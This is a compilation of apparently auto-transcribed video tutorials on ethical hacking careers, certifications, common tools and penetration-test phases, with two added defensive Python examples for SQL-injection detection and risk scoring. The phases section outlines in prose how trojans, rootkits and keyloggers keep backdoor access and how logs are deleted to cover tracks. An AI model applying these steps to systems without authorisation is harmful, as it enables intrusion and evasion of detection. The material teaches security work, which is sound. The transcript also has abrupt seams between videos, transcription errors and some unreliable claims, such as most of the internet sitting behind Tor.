hacking field so starting with like there are several job roles in ethical hacking such as here’s an elaboration on each job role in ethical hacking and we’ll see some of the major ethical hacker job roles so starting with ethical hacker so an ethical hacker is a skilled professional who legally attempts to penetrate computer system and networks to identify vulnerabilities and weaknesses they use their knowledge to strengthen the security infrastructure and protect against cyber threats and the next is network security engineer network security engineers specialize in securing and

    maintaining computer networks within an organization they implement and manage security measures such as firewalls intrusion detection systems and virtual private networks that is VPNs to protect sensitive data then we have cyber security analyst so cyber security analyst monitor and analyze systems for potential security breaches or incidents they investigate threats develop security protocols and implement measures to protect against attacks the next is penetration tester penetration testers also known as ethical hackers simulate real world attacks to identify vulnerabilities in computer systems networks and applications they conduct thorough assessments and provide recommendations for improving security the next is information security manager information security managers are responsible for overseeing an organization’s overall security strategy and ensuring the protection of sensitive data they develop and implement security policies manage security teams and handle incident response and the next is cyber security engineer so cyber security engineers design and implement security systems including firewalls encryption protocols and intrusion detection systems they also conduct risk assessments and perform security audits to maintain a security environment and the next is security consultant security consultants provide expert advice and guidance on security strategies and solutions they assess vulnerabilities develop security plans and assist organizations in improving their overall security posture in the United States these requirements are very high and this was all for this tutorial did you know that in August this year Google openly admitted that some of its Gmail accounts were hacked by an Iranian group fortunately the event was isolated and was taken care of but rarely are security breaches this easy to stop with more and more data moving to the cloud the prospects of hacks like these have grown in the past decade exponentially consequently 
organizations have now discovered the need to secure the digital infrastructure against various attack vectors fueling the need for ethical hackers in the IT industry see today’s video is all about how you can learn the ins and outs of hacking and cyber security irrespective of your learning background so welcome to our video on how to become an ethical hacker by simply learning before we get started ensure you’re subscribed to our channel so you always stay updated with the latest technologies and trends let’s first clear the air on an ethical hacker’s role the term hacking has inherently negative connotations however this will only be applicable until the duty of an ethical hacker is properly understood ethical hackers are the good people in the hacking field wearing the white hat so what exactly is the responsibility of an ethical hacker instead of utilizing their extensive computer expertise for criminal purposes ethical hackers find gaps in data and computer security for businesses and organizations worldwide to defend themselves against hackers with less than noble intentions ethical hacking is a subcategory of cyber security that involves lawfully breaking a system security mechanisms in order to discover possible threats and data leaks on the network ethical hackers can work for a corporation as independent freelancers in-house security staff for its website or its applications or as simulated offensive cyber security professionals as well all of these careers need knowledge of current attack methodologies and tools albeit the in-house expert may need to be knowledgeable about a single kind of software or digital asset but how can you hone your ethical hacking skills let’s take a look at few steps one can take while starting a career in this field the first step is getting comfortable with Linux there are operating systems catered specifically to ethical hackers like Kali Linux and Parrot Security both are based on Linux derivatives and have a plethora of 
tools to make your hacking workflow easy and relatively stress-free the better vers you are with Linux and its terminal the quicker you can achieve things when hacking the next would be to master the mother of all programming languages which is the C programming language since Linux and a lot of backend code are written in C having a strong hand over this programming language is very important it’s always helpful to learn a couple more relevant languages like Python or JavaScript which will help you dissect giant pieces of server code like butter remaining anonymous is vital in the hacking sphere since giving a malicious actor news of your existence on a target network can cause him then to flee or attack your device instead the usage of MAC address randomizers and proxy chains is highly beneficial and recommended when monitoring networks for criminal activity and speaking of proxies ethical hackers must understand networking fundamentals and exactly how they are established learning about various networks and protocols might help you exploit flaws an ethical hacker with an extensive understanding of networking tools such as Wireshark Nap and others can overcome field incidents relatively unscathed the fifth skill in our list is traversing the dark web using the famous to browser most of the internet is hidden behind the tour networks and getting a closer look at the people who often are at the forefront of the hacking industry in the dark web directly can help you familiarize yourself with a certain domain secrets while keeping you updated with the latest happenings in the cyber crime world a major advantage that can tip the scales in the favor of an ethical hacker is the knowledge of cryptography or encryption encryption is used in various elements of information security including authentication data integrity anonymity and others passwords and other sensitive information are always encrypted on a network a hacker must understand how to recognize and break these 
encryption standards exploiting vulnerabilities make you a better ethical hacker simply keeps you aware of the security measures that are kept in place as industry standards while handing you the most advanced penetration testing tools on the market learning how to scan networks and systems for vulnerabilities that might result in a security breach ethical hackers may also attempt to write vulnerabilities to exploit the system in question as a final tip join forums for conversations with other hackers worldwide to trade share expertise and collaborate discord Reddit Telegram and other platforms all have communities where you can join and collaborate with fellow learners to broaden your learning spectrum now that we understand some basic skills ethical hackers need to excel in this domain let us look at the road map one can follow to get started many ethical hackers begin their careers by studying computer science you can also acquire an A+ certification from compia by appearing for and passing two additional tests these tests assess an individual’s understanding of PC components and their ability to disassemble and reassemble a PC however before advancing in your profession you must gather experience and obtain a network plus or a CCNA certification the Network Plus certification certifies fundamental network expertise such as network administration maintenance deployment and troubleshooting the CCNA certification guarantees the same skills and strives for foundation level proficiency once qualified you can advance to the next level of your career in network support you’ll be responsible for monitoring and upgrading installing security software and testing for vulnerabilities you’ll obtain expertise in network security and your goal should be offered as a position as a network engineer as a network engineer you will build and plan networks rather than simply maintain them your focus should now be on the security part of your journey to becoming an ethical hacker 
this is the time to focus on earning a security certifications such as security plus or CISSP the US Department of Defense has approved the security plus acquisition which covers testing on critical areas such as access control identity authentication and cryptography the CISSP certification is a worldwide recognized security acquisition that validates the expertise of risk management cloud technology and application development the next step would be to start working in the information security division an information security analyst studies systems and network security engages with security breaches and strives to implement security solutions for this profession you should focus on penetration testing to gain hands-on experience is some of the most essential tools of the trade getting the certified ethical hacker or the CE certification should be your top priority the training will teach you all you must understand to become a productive and ethical hacker you will be engaged in a hands-on environment where you will be guided through breaking into a network and finding any security flaws after obtaining this certification you can begin marketing yourself as a professional ethical hacker we have already covered some skills one needs to learn when starting their journey however an ethical hacker has certain roles and responsibilities that must be carried out meticulously the first of which is threat modeling threat modeling is optimizing network security by identifying vulnerabilities and determining counter measures for avoiding or reducing an attack’s impact on the system a threat is a real or projected negative incident jeopardizing the organization’s assets the role of an ethical hacker is to give a thorough assessment of potentially harmful assaults and their potential consequences they can also conduct information security audits or a risk based evaluation of a company’s security these regular exercises assess security readiness identify IT system weaknesses 
and offer strategies for reducing future attack threats they also assess how successfully security related policies are implemented resulting in a report that includes discovered flaws and appropriate solutions ethical writers must be able to collect data detect vulnerabilities and coordinate risks to create clear and unambiguous professional reports these evaluations are frequently used to justify finalizing security asset expenditures the market for trained ethical hackers has never been this expansive according to various surveys the job outlook for ethical hackers and information security analysts is supposed to grow by 33% between 2020 and 2030 companies like IBM Google and Microsoft are always on the lookout for trained cyber security personnel in this climate of data breaches and security vulnerabilities we hope this video has cleared some doubts regarding where to start and what to learn during this journey when it comes to web app hacking it generally refers to the exploitation of applications by HTTP which can be done by manipulating the applications via its graphical user interface this is done by tampering with the uniform resource identifier also known as a URI or tampering with the HTTP elements directly which are not a part of the URI the hacker can send a link via an email or a chat and may trick the users of a web application into executing actions in case the attack is on an administrator account the entire web application can be compromised anyone who uses a computer connected to the internet is susceptible to the threats that computer hackers and online predators pose these online villains typically use fishing scams spam email or instant messages and bogus websites to deliver dangerous malware to your computer and compromise your computer security computer hackers can also try to access your computer and private information directly if you’re not protected by a firewall they can monitor your conversations or peruse the back end of your personal 
website. Usually disguised with a bogus identity, predators can lure you into revealing sensitive personal and financial information.

A web server can refer to the hardware (the computer) or the software which helps to deliver content that can be accessed through the internet. The primary function of a web server is to deliver these web pages on request to clients using the Hypertext Transfer Protocol, or HTTP. So hackers attack the web server to steal credential information, passwords and business information by using different types of attacks like DoS attacks, SYN flooding, ping flood, port scans and social engineering attacks. In the area of web security, despite strong encryption on the browser-server channel, web users still have no assurance about what happens at the other end.

Although wireless networks offer great flexibility, they have their own security problems. A hacker can sniff the network packets without having to be in the same building where the network is located; as wireless networks communicate through radio waves, a hacker can easily sniff the network from a nearby location. Most attackers use network sniffing to find the SSID and hack a wireless network. An attacker can attack a network from a distance, and therefore it is sometimes difficult to collect evidence against the main hacker.

Social engineering is the art of manipulating users of a computing system into revealing confidential information which can later be used to gain unauthorized access to a computer system. The term can also include activities such as exploiting human kindness, greed and curiosity to gain access to restricted-access buildings, or getting users to install backdoor software. Knowing the tricks used by hackers to trick users into releasing vital login information is fundamental in protecting computer systems.

Coming to our main focus for today, let us have a look at the top five most essential ethical hacking tools to be used in 2021. At the top of the chain lies Nmap.

Nmap, which stands for Network Mapper, is a free and open-source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. It is most beneficial in the early stages of ethical hacking, where a hacker must figure out the possible entry points to a system before running the necessary exploits, thus allowing the hackers to leverage any insecure openings and breach the device. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services they are running, what operating systems are installed, what type of packet filters and firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks but works fine against single hosts as well. Since every application that connects to a network needs to do so via a port, the wrong port or server configuration can open a can of worms which leads to a thorough breach of the system and ultimately a fully hacked device.

Next on our list we have Metasploit. The Metasploit framework is a very powerful tool that can be used by cyber criminals as well as ethical hackers to probe systematic vulnerabilities on both networks and servers. Because it’s an open-source framework, it can be easily customized and used with most operating systems. With Metasploit, the ethical hacking team can use ready-made or custom code and introduce it into a network to probe for weak spots, as another flavor of threat hunting. Once the flaws are identified and documented, the information can be used to address systemic weaknesses and prioritize solutions. Once a particular vulnerability is identified and the necessary exploit is fed into the system, there are a host of options for the hacker. Depending on the vulnerability, hackers can even run root commands from the terminal, allowing complete control over the activities of the compromised system as
well as all the personal data stored on the device. A big advantage of Metasploit is the ability to run full-fledged scans on the target system, which gives a detailed picture of the security index of the system along with the necessary exploits that can be used to bypass the antivirus software. Having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers, as denoted by its high rank in the list.

Moving on, we have the Acunetix framework. Acunetix is an end-to-end web security scanner which offers a 360-degree view of an organization’s security. It is an application security testing tool that helps the company address vulnerabilities across all their critical web assets. The need to be able to test applications in depth, further than traditional vulnerability management tools, has created a market with several players in the application security space. Acunetix can detect over 7,000 vulnerabilities, including SQL injections, cross-site scripting, misconfigurations, weak passwords, exposed databases and other out-of-band vulnerabilities. It can scan all pages, web apps and complex web applications running HTML5 and JavaScript as well. It also lets you scan complex multi-level forms and even password-protected areas of the site. Acunetix is a dynamic application security testing package which has definite perks over static application security testing frameworks, which are also known as SAST scanners. SAST tools only work during development and only for specific languages, and have a history of reporting a lot of false positives, whereas dynamic testing tools, also known as DAST, have the ability to streamline testing from development to deployment with minimal issues.

Next on our list we have Airgeddon. This is a multi-use bash script used on Linux systems to hack and audit wireless networks like our everyday Wi-Fi router and its counterparts, along with being able to launch denial-of-service attacks on compromised networks.
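As an added illustration of the SAST/DAST distinction described above, here is a minimal static check written for this page in Python; it is example code, not part of the transcript and not code from Acunetix or any other scanner the speaker names. It walks a module’s syntax tree and flags database execute() calls whose query string is assembled at run time (f-string, % formatting, .format() or concatenation with a variable), and it shows how a naive version of the same rule produces the kind of false positive the speaker attributes to static tools: a query built only from constant strings. The sample module it scans is constructed for the example.

```python
"""Minimal SAST-style check for SQL queries assembled at run time.

Added example for this page; not code from the transcript or from any
scanner it names. The module text in SAMPLE_SOURCE is constructed.
"""
import ast
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample module: four risky query-building patterns, one safe
# parameterised query, and one concatenation of string literals only, which
# a naive rule reports as a false positive.
SAMPLE_SOURCE = '''
def by_name_fstring(cur, name):
    cur.execute(f"SELECT * FROM users WHERE name = '{name}'")

def by_name_percent(cur, name):
    cur.execute("SELECT * FROM users WHERE name = '%s'" % name)

def by_name_format(cur, name):
    cur.execute("SELECT * FROM users WHERE name = '{}'".format(name))

def by_name_concat(cur, name):
    cur.execute("SELECT * FROM users WHERE name = '" + name + "'")

def by_name_param(cur, name):
    cur.execute("SELECT * FROM users WHERE name = ?", (name,))

def all_users(cur):
    # only literals are joined; a naive check would still report it
    cur.execute("SELECT id, name " + "FROM users")
'''


@dataclass
class Finding:
    line: int     # line in the scanned source
    reason: str   # how the query string was built


def _only_constants(node: ast.AST) -> bool:
    """True if the expression is built purely from string literals."""
    if isinstance(node, ast.Constant):
        return isinstance(node.value, str)
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        return _only_constants(node.left) and _only_constants(node.right)
    return False


def _classify(query: ast.AST) -> Optional[str]:
    """Return why the query expression is dynamic, or None if it is static."""
    if isinstance(query, ast.JoinedStr):
        return "f-string"
    if isinstance(query, ast.BinOp) and isinstance(query.op, ast.Mod):
        return "% formatting"
    if (isinstance(query, ast.Call) and isinstance(query.func, ast.Attribute)
            and query.func.attr == "format"):
        return ".format()"
    if isinstance(query, ast.BinOp) and isinstance(query.op, ast.Add):
        return None if _only_constants(query) else "string concatenation"
    return None


def find_dynamic_sql(source: str, strict: bool = False) -> List[Finding]:
    """Flag execute() calls whose first argument is assembled at run time.

    strict=True reports every concatenation, constants included, which is
    the false-positive behaviour of a cruder static rule.
    """
    findings: List[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                and node.func.attr == "execute" and node.args):
            continue
        query = node.args[0]
        reason = _classify(query)
        if reason is None and strict and isinstance(query, ast.BinOp):
            reason = "string concatenation (constants only)"
        if reason is not None:
            findings.append(Finding(node.lineno, reason))
    return findings


if __name__ == "__main__":
    for f in find_dynamic_sql(SAMPLE_SOURCE):
        print(f"line {f.line}: query built via {f.reason}")
```

The precise rule reports lines 3, 6, 9 and 12 of the sample and accepts the parameterised query on line 15 and the literal-only concatenation on line 19; the strict rule adds line 19. A check like this only sees source code, which is why the speaker contrasts it with a DAST tool that exercises the running application.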
This multi-purpose Wi-Fi hacking tool has very rich features which support multiple methods for Wi-Fi hacking, including WPS hacking modes, WEP attacks, handshake captures, evil twin and so much more. It usually needs an external network adapter that supports monitor mode, which is necessary to be able to capture wireless traffic that traverses the air channels. Thanks to its open-source nature, Airgeddon can be used with multiple community plugins and add-ons, thereby increasing its effectiveness against a wide variety of routers, both in the 2.4 GHz and the 5 GHz band.

Finally, at number five we have John the Ripper. John the Ripper is an open-source password security auditing and password recovery tool which is available for many operating systems. John the Ripper Jumbo supports hundreds of hash and cipher types, including for user passwords of operating systems, web apps, database servers, encrypted keys and document files. Some of the key features of the tool include offering multiple modes to speed up password cracking, automatically detecting the hashing algorithm used by the passwords, and the ease of running and configuring the tool to make password cracking easier. It can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources. The word list being used in these dictionary attacks can be supplied by the users, allowing for a completely customizable process.

We also have a few honorary mentions in our list that just missed the cut. Netsparker, for instance, is an automated yet fully configurable web application security scanner that enables you to scan websites, web applications and web services. The scanning technology is designed to help you secure web applications easily without any fuss, so you can focus on fixing the reported vulnerabilities. Burp Suite Professional is one of the most popular penetration testing and vulnerability finder tools and is used for checking web
application security. Burp, as it is commonly known, is a proxy-based tool which is used to evaluate the security of web-based applications and to do hands-on testing. Moving away from websites and applications, Wireshark is a free and open-source packet analyzer which was launched in 2006. It is used for network troubleshooting, analysis, software and communications protocol development, and education. It captures network traffic on the local network and stores data for offline analysis. Wireshark captures network traffic from Ethernet, Bluetooth, wireless networks and frame relay connections.

Now that we have learned about the different types of tools that can be used when conducting an ethical hacking audit, let’s learn about some potential benefits of such campaigns and why organizations prefer to pay for such audits. Being able to identify defects from an attacker’s perspective is game-changing, since it displays all the potential avenues of a possible hack. One can only prepare for the known vulnerabilities as a defensive specialist, but proactively trying to breach a network or device can make hackers think of techniques that no defense contractors can account for. This kind of unpredictability goes a long way in securing a network against malicious actors. Another advantage of hiring ethical hackers is the ability to preemptively fix possible weak points in a company’s network infrastructure. As seen on many occasions, a real breach will cause loss of data and irreparable damage to the foundation of an organization; being able to gauge such shortcomings before they become public and can be exploited is a benefit most organizations make use of. This is not to imply that such security audits are only beneficial to the organization paying for them. When coming across companies that provide certain services, a reliable third-party security audit goes a long way in instilling trust and confidence in their craft. If the ethical hackers cannot find any major vulnerabilities that can be
leveraged by hackers, it just accentuates the technical brilliance of the organization and its engineers, thereby increasing the clientele by a substantial amount.

In this session we are going to discuss ethical hacking and penetration testing. We’re going to talk about the concepts of what constitutes an ethical hack and what a penetration test is. We’re going to talk about the different types of penetration test and how they can be done. We’re going to talk about an operating system called Kali Linux, its usage and its importance in cyber security. We will also be discussing the different phases of a penetration test and how people, or hackers, would utilize these phases to gain their objectives. We’ll also be discussing in what areas we can do a penetration test and how to do those penetration tests. We’ll be discussing quite a few of the penetration testing tools that are available in the Kali Linux space, and then we’ll be looking at a couple of demos at the end of the session to understand how these tools in the operating system can be utilized for various hacks.

So let’s start with what ethical hacking is. Plainly defined, ethical hacking is locating weaknesses or vulnerabilities of computers and information systems using the intent and actions of a malicious hacker. The major difference here is that we are hired to discover those weaknesses in a legal and ethical manner. That means, first and foremost, our intent should not be malicious: we do not wish any harm to the organization, and whatever we discover is reported back and not misused. Once we report back, we would also be trying to help them out to mitigate or remove those weaknesses or vulnerabilities to enhance the company’s security posture. So essentially we would have the same training or the same knowledge as that of a malicious hacker, except that the intent is going to be different. The intent is going to be to help the organization achieve security, to protect themselves against malicious
hackers. The second most important thing about ethical hacking is that we are authorized to do that activity. I cannot in good faith hack somebody and then tell them, “You know what, I just wanted to help you out, and here are your vulnerabilities, and this is the way you can prevent them.” I first need the authorization from the other party, and only then can I perform an ethical hack. So in this example, a hacker attacks an individual with malicious intent and misuses whatever information they have gotten: they steal the data, they maybe fry the operating system or the hardware, destroy it, and thus they leave the victim without a device. With authorization, an ethical hacker can also attack the same individual, minus the destruction of course, and the intent is good: they’re willingly finding out the vulnerabilities and helping the victim plug them so that they wouldn’t be a victim of a malicious attack. So here the first thing is authorization from the victim, and the second thing is the good intent, where we do not misuse those vulnerabilities and we report them back to the victim or to the client and help them patch those vulnerabilities. That’s the main difference between a white hat and a black hat: security experts are normally termed white hat hackers, and malicious hackers are termed black hats.

Now, the responsibilities of an ethical hacker are manifold. First and foremost, you have to create scripts to test for vulnerabilities, but first you have to identify those in the first place. So there’s a vulnerability assessment, identifying those vulnerabilities, and then you’re going to test them to see the validity and the complexity of those vulnerabilities. One of your responsibilities would be to develop tools to increase security as well, or to configure security in such a way that it would be difficult to breach. Then there is performing risk assessment. Now, what is a risk? A risk is a threat that is posed to an organization by a possibility of getting hacked. So let’s say
I, as an ethical hacker, run a vulnerability scanner on a particular client. I identify 10 different vulnerabilities. Within those 10 vulnerabilities, I do a risk assessment to identify which vulnerability is critical, would have the most impact on the client, and what the repercussions would be if those vulnerabilities actually get exploited. So in the risk assessment I’m trying to find out, if the client gets hacked with the vulnerabilities identified, what loss they would be facing once they get hacked. And the loss could not only be loss of data; it could be financial losses, it could be loss of reputation, penalties they have to pay to clients for breaches, or penalties that they may have to pay to governments in case of breaches that happened that couldn’t be controlled. Another responsibility of the ethical hacker is to set up policies in such a way that it becomes difficult for hackers to get access to devices or to protected data. And finally, train the staff for network security. We’ve got a lot of employees in an organization; we need to train the staff on what is allowed and what is not allowed, and how to keep themselves secure so that they don’t get compromised, thus becoming a vulnerability themselves to the organization. The policies that we have talked about are administrative policies to govern the employees of the organization, for example password policies. Most organizations will have a tough password policy, where they say you have to create a password that meets a certain level of complexity before it can be accepted, and till you create that password you’re not allowed to log in or you’re not allowed to register.

So let’s move on to understand what penetration testing is. Now, for penetration testing there is a phase called vulnerability assessment that happens before it. Vulnerability assessment is nothing but running a scanning tool to identify a list of potential flaws or vulnerabilities within the organization. Once you have identified
the list of those vulnerabilities, you would then move on to the penetration test. This is the part of ethical hacking which specifically focuses on penetration only of the information systems. So you have identified that flaw; maybe it could be a database with a SQL injection, or it could be a buffer overrun flaw, or it could be a simple password cracking attempt. Your idea is to create those tools, create those attacks and try to penetrate into those areas where security is weak. The essence of penetration testing is to penetrate information systems using various attacks. The attacks could be anything like a phishing attack, a password cracking attack, a denial-of-service attack, or any other vulnerabilities that you have identified during the vulnerability scan.

So what is Kali Linux and why is it used? Kali Linux is an operating system often used by hackers and ethical hackers both, because of the tool sets that the operating system contains. It is an operating system created by professionals with a lot of embedded tools. It is a Debian-based operating system with advanced penetration testing and security auditing features. There are more than 600-odd tools on that operating system that can help you leverage any of the attacks: man-in-the-middle attacks, sniffing, password cracking; any of these attacks would be possible with all the tools available. You just need to know how to utilize the operating system and its tools. It contains, like I said, hundreds of tools that are used for various information security tasks like computer forensics, reverse engineering, information finding, even getting access to different machines and then creating viruses, worms, anything that you will, with the 600-plus tools in the Kali Linux operating system. There are periodic updates that are given out to the operating system as well. It is open source; that means it is free to utilize, you can even have the source code, and you can modify it if you want to. There are customizations
available for all the tools. You can download third-party tools and install them if you want. There’s wide support for wireless network cards; multiple languages are being supported at the same time as well. And you can create a lot of attacking scripts, you can create attacking tools, and you can write your own exploits as well on Kali Linux. So all in all this helps you create a very robust system where you can create your own attacks and then launch them against unsuspecting victims. Now that is illegal, so as far as ethical hacking is concerned, once you have authorization you’re going to identify which tools are to be utilized, you’re going to get the appropriate permissions, and only then are you going to attempt those attacks.

Let’s talk about the phases of penetration testing now. There are five different phases. The first one is the reconnaissance phase, also known as the information gathering phase. This is the most important phase for any hacker. This is where the hacker, or the ethical hacker if you will, will gather as much information as possible about the target, the victim. Once you have that information, you would then be able to identify what tool sets to include and how to attack the victim. For example, you want to find out the IP addresses, the domains, subdomains, the network architecture that is being utilized; you want to identify the operating systems that are being utilized, the network IP ranges that are being utilized, and so on and so forth. You might want to identify employees within an organization for social engineering attacks in the future, email addresses, telephone numbers; anything and everything that will help you validate and give you information about the target is something that you want to do in the reconnaissance phase. At this point in time we are not going to question whether whatever information we are getting is useful or not; only time will tell, depending on the various attacks that we will be building up later on.
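Returning to the risk assessment described earlier in this section, where the vulnerabilities from a scan are ranked by how critical they are and by the loss they would cause (data, financial, reputation, penalties): here is an added example of that prioritisation, written for this page in Python. It is not code from the transcript or from any scanner the speaker mentions, and every finding, likelihood score and impact score in it is constructed to show the method; a real assessment would take them from the scan report and the client’s business context.

```python
"""Rank vulnerability-scan findings by risk before the penetration test.

Added example for this page, not code from the transcript or from any
scanner it names. Findings and scores below are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Loss categories the speaker lists: data, financial, reputation, penalties.
IMPACT_CATEGORIES = ("data", "financial", "reputation", "regulatory")


@dataclass
class VulnFinding:
    name: str
    likelihood: int          # 1 (rare) .. 5 (almost certain) to be exploited
    impact: Dict[str, int]   # per-category impact if exploited, 1 .. 5
    exposed: bool = False    # reachable from the internet, not only the LAN

    def overall_impact(self) -> int:
        """The worst-hit category drives the rating: a breach that wrecks
        reputation is severe even if the direct financial loss is small."""
        return max(self.impact.get(c, 1) for c in IMPACT_CATEGORIES)


def risk_score(f: VulnFinding) -> int:
    """Classic 5x5 likelihood-times-impact matrix (1..25). Internet exposure
    raises likelihood by one step because anyone can reach the service."""
    likelihood = min(5, f.likelihood + (1 if f.exposed else 0))
    return likelihood * f.overall_impact()


def risk_band(score: int) -> str:
    """Translate a matrix score into the band that sets the fix priority."""
    if score >= 15:
        return "Critical"
    if score >= 10:
        return "High"
    if score >= 5:
        return "Medium"
    return "Low"


def prioritize(findings: List[VulnFinding]) -> List[Tuple[str, int, str]]:
    """Return (name, score, band) with the most urgent fix first; ties are
    broken by name so the report is stable between runs."""
    ranked = sorted(findings, key=lambda f: (-risk_score(f), f.name))
    return [(f.name, risk_score(f), risk_band(risk_score(f))) for f in ranked]


# Constructed findings, in the shape a vulnerability scan might report them.
SAMPLE_FINDINGS = [
    VulnFinding("SQL injection in customer portal login", 4,
                {"data": 5, "financial": 4, "reputation": 5, "regulatory": 5},
                exposed=True),
    VulnFinding("Default credentials on internal printer", 3,
                {"data": 2, "financial": 1, "reputation": 1, "regulatory": 1}),
    VulnFinding("Outdated TLS version on intranet wiki", 2,
                {"data": 3, "financial": 2, "reputation": 2, "regulatory": 2}),
    VulnFinding("Missing rate limit on public password reset", 3,
                {"data": 3, "financial": 2, "reputation": 3, "regulatory": 2},
                exposed=True),
]

if __name__ == "__main__":
    for name, score, band in prioritize(SAMPLE_FINDINGS):
        print(f"{band:<8} {score:>2}  {name}")
```

With these constructed inputs the internet-facing SQL injection scores 25 (Critical), the unthrottled public password reset 12 (High), and the two internal findings 6 (Medium) each; the ordering, not the absolute numbers, is what feeds the report and the order in which the penetration test exercises the findings.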
This becomes your baseline; this becomes your database with all the information about the victim, so that you can come back from later stages to the reconnaissance phase to look at the information that you have gathered, and then you can fine-tune your attacks.

Once you have done that, you’re going to start the scanning phase. Based on the information that you have gathered, you’re going to identify live machines within a network. Once you have identified the live machines, you’ll scan them for open ports, protocols and procedures, any processes that are running, and then we are going to identify vulnerabilities within these processes and within these open ports. So in the scanning phase, why do we need to find live machines? Because we want to find out the machines that have booted up, have an operating system and are running on the network. If a machine is not available on the network or is in a shutdown mode, that machine cannot be hacked through a technical attack; then it will be a physical attack, where you physically go to the machine and then do whatever you want to do with it. For a technical attack you will have to identify the machines that have booted up. Then you’re going to scan the open ports, because that’s going to be our entry point, and on the port there would be a service that is running, so you scan the service as well, identify the version of the service, and then do a vulnerability scan to identify if there are any vulnerabilities on those services that are running. And then, based on all of this information, we are going to develop our attacks as we go on.

So once we have this, we go on to the gaining access phase, where we are going to attack and try to get access to our victim’s machines. It could be a social engineering attack based on the information gathering we have done; in the technical assessment and scanning phase, if we have identified a vulnerability, we’re going to identify a relevant exploit and then use that exploit to try to gain access, or we might
just craft a trojan and try to execute that trojan on the victim’s machine to check if we can get access in that particular manner. It could even be a simple password cracking attack which we have been able to accomplish, where we have cracked the password of the person and now we have gained access to that person’s computer. But these attacks would be temporary. For example, we have cracked a password; somebody changes the password every 30 days, and after that period our attack would be useless. If a trojan is executed we get a connection to that machine once, but then how do we get a repeated connection over and over again if we want to reconnect to that machine? So that’s where we come into the maintaining access phase, where we install rootkits, keyloggers, sniffers and things like that, through which we could get a backdoor entry to the victim’s machine. If we have already successfully installed a trojan, we would want to add the trojan to the startup menu so that every time the operating system starts, the trojan gets automatically executed, and thus we maintain the backdoor entry to that victim’s machine.

Once we have done all of this, all these activities are going to leave a trace on the victim’s machine. So if you install a trojan, a trojan being an application, it would create directories and files; a virus would be destructive in nature; if you’re executing a script it will leave some logs behind; and even if we log in through the cracked password that we have, it will create a login entry for that particular timestamp along with the IP address that we utilized. In the covering tracks phase we are essentially trying to avoid detection by deleting traces of our activity. That means that we need to identify where logs have been stored, we need to address those logs, and we need to delete them or modify them in such a way that our activity is not traceable. So these are the five main phases of a penetration test: gather as much information as you can; scan
for machines, ports, protocols and services running on the victim’s device; try to gain access by password cracking, trojans, or exploits for the vulnerabilities, if any; maintain that access by installing further software which will allow you to gain backdoor access to that particular system; and then try to cover your tracks by deleting all traces of your activity. Once successful, the victim will have no idea, and you have a backdoor entry and you can monitor the victim to the extent that you want.

Now, from an ethical hacker’s perspective, this penetration test can be done in multiple aspects. So again, understand the fact that we are doing an authorized activity: we have identified the tools that we have to use, identified the attacks, we have got the appropriate authorization, and based on that authorization we are conducting a penetration test. The penetration test may be asked to be done in one of these manners. First is the black box test. The black box test is where no information is given to the ethical hacker about the IT infrastructure, so they have no idea what it is. They start right from the first phase of information gathering, gather as much information as they can, and based on the gathered information they try to create and launch attacks to see if they are going to be successful. Now, not only does it test the knowledge of the penetration tester, it would also test the security implementations that the organization has done, to see whether they can identify the attack and prevent it in the first place. So this is the simulation of a malicious hacker scenario, where a malicious hacker having no idea about the organization first tries to gather information and then tries to attack that organization. So no source code knowledge, no technological knowledge, nothing; they’re just going to try to gather information, scan those devices and then try to gain access. The second test is a gray box test, where some information is given or some knowledge of the IT infrastructure is given. Think of it
from an employee’s perspective: a regular employee in an organization who doesn’t have extra privileges like an administrator, but is just a regular employee. That means that they’ve got limited access within the organization, based on which they get some knowledge of the IT infrastructure. So this is an attempt at an insider attack simulation, where a regular user may want to try to misuse the access that they’ve been given and then try to gather information or try to gain access to other devices which they are not authorized to. The third test is white box, where full knowledge of the IT infrastructure has been given. So this is again a simulation of an insider attack, a malicious insider if you will, but at this point in time the person has complete knowledge of the infrastructure, could be in an administrative position, and then they are trying to leverage their access to see if they can get information or they can compromise any of the data. So the three attacks would be: the first one, black box, where we are simulating an external threat, a hacker sitting outside the organization trying to gain access; the gray box is an insider threat, where there’s a regular employee who is trying to get access to infrastructure that they are not authorized for; and then the third audit is a white box audit, where there’s an administrator who has all the leverage, all the access and the visibility within the infrastructure, and then they are trying to misuse their access to see what else they can get from whatever access has been authorized to them.

Now let’s look at the areas of penetration testing: where all could we do a penetration test, thus compromising the security of the application, or of the server, or of the user? First and foremost, network services. This finds vulnerabilities and weaknesses in the security of the network infrastructure. So for example, we have switches, routers and firewalls in the network; all of these are devices that need a configuration. If they have been
not correctly configured, or if they have not been correctly secured, they would leave some vulnerabilities behind. If we as ethical hackers are able to identify these flaws, these misconfigurations, these vulnerabilities, we could then try to exploit them and try to gain access to the network and the devices within that network by getting access to the network in the first place. Then we have the web applications. Web applications are nothing but software that is developed over or deployed over a web server and made available over the internet or the intranet, for example websites that we visit or web applications like Facebook, if you will. So if these applications have vulnerabilities within them, we then try to attack the web-based applications and thus try to bypass authentication, or get access to the database, or try to leak information through those applications. If not, then we try to attack the client side. Now, the web application is at the server level and is hosted by the deployer, so that’s the server side; the client side is where we as users are using a computer with a browser and trying to interact with the web application. Now, the browser and the operating system that we are utilizing would have their own vulnerabilities, thus identifying a client-side vulnerability and then exploiting it to either hack the client, or then piggyback on the client’s connection and try to get access to the server. So either you could attack the network, the web application or the client side itself, or you could attack wireless networks. This test would examine all the wireless devices which are used in a corporation. Most wireless networks would have laptops, smartphones, tablets, phablets, all of those connected to them. If you’re able to access any of these devices through the wireless, it would help you gain access to other devices on the wireless as well. And then social engineering: this is where you’re trying to attack humans. You’re tricking an employee of a corporation to reveal
